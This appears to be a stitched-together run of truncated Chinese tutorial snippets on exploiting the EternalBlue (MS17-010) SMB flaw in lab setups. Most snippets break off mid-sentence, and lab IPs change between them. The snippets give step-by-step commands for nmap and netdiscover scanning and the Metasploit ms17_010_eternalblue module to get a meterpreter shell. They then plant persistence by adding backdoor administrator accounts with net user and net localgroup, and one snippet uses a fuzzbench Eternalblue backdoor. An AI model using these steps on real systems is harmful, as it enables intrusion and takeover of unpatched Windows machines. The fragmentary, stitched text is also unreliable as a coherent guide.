首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。 首先开启Metasploit框架,这是一款集合各种漏洞和后期利用工具的框架,强大到不需要太多专业知识就可以快速上手的攻击框架,配合图形化...
(1)启用msf (2)搜索msf中和ms17-010漏洞相关的脚本 (3)使用ms17-010的辅助模块脚本(即搜到的3号模块) (4)配置辅助模块脚本相关内容 show options 可以看到哪些项需要配置,其中Required =Yes的需要自己手动配置,这里需要手动配置目标IP地址,即RHOSTS项 使用Set RHOSTS+IP即可配置 (5)运行辅助模块脚本,检测靶机是...
命令:nmap -sS 192.168.64.169 5.kali打开msfconsole 命令:msfconsole 6.在MSF里搜索ms17-010 命令:search ms17-010 可以看到列出来ms17-010可利用的漏洞,这里我们使用标识0 exploit/windows/smb/ms17_010_eternalblue进行攻击 7.使用永恒之蓝漏洞,使用use 命令进行命令使用 命令:use 0或者use exploit/windows/s...
msfconsole> exploit(run) 渗透操作一:创建用户和更改密码 ms17-010 绕过远程登入输入密码的后门 利用3389端口 mstsc win7 本地组策略secpol.msc 账户空密码登陆只允许在控制台登录 修改命令(windows) net user admin * 创建新用户:net user jntm /add 设成管理员:net localgroup administrators jntm /add 靶机控...
或者使用netdiscover扫描 netdiscover -r 192.168.83.0/24 1. 这里我们可以看到靶机的ip地址为:192.168.83.130 2.使用NMAP进行漏洞扫描 nmap --script=vuln 192.168.83.130 可以看到扫出了MS17_010 1. 2. 3.利用MSF模块进行渗透 首先打开msf,在命令行中输入msfconsole ...
背景:利用msf攻击框架复现永恒之蓝漏洞 第一步 搭建攻击机和靶机 攻击机使用kali就可以了,自带msf,用起来也方便,ip地址为192.168.145.110 攻击机IP 靶机使用虚拟机win7,查看了系统没有安装ms17-010的补丁,IP地址为192.168.145.119,且开放了445端口,一切就绪。
从最终效果来看,此时Kali Linux通过MS17-010渗透代码,直接拿到Win7的Shell,之后便可以通过Shell对目标靶机进行控制。 ④通过Shell对靶机Win7进行控制 创建用户名密码 blue/blue net user blue blue /add 将用户blue添加入管理组 net localgroup administrators blue /add ...
永恒之蓝(ms17-010)过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
检查出来server2008可能存在ms17-010漏洞,那就开始攻击 6.使用攻击模块0,进行攻击(使用永恒之蓝攻击模块) use 0 #使用0模块 set RHOSOT 192.168.0.116 #设置攻击ip run #开始运行 有WIN字眼时,出现meterpreter,也就是攻击成功了,成功get shell 7.在meterpreter也可以使用很多命令 ...
在攻击机中启动命令行,进入fuzzbench的Windows文件夹,用python启动fuzzbench: 启动后设置靶机IP-设置击机IP-重定向no-log地址确认(无误直接回车)-0+回车(创建新的项目)-为项目命名-设置路径(Yes)-: 使用永恒之蓝建立后门: use Eternalblue 之后一直回车到出现设...